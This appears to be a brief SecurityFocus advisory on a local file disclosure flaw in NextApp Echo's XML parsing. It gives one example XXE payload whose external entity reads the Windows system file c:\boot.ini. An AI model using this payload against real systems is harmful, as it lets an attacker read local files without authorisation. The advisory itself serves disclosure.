NextApp Echo XML Parsing Local File Disclosure Vulnerability

Attackers may exploit this issue through a browser.

The following example XML input is available:

<?xml version="1.0"?><!DOCTYPE sec [<!ELEMENT sec ANY><!ENTITY mytestentity SYSTEM "file:///c:\boot.ini">]>


 

Privacy Statement
Copyright 2010, SecurityFocus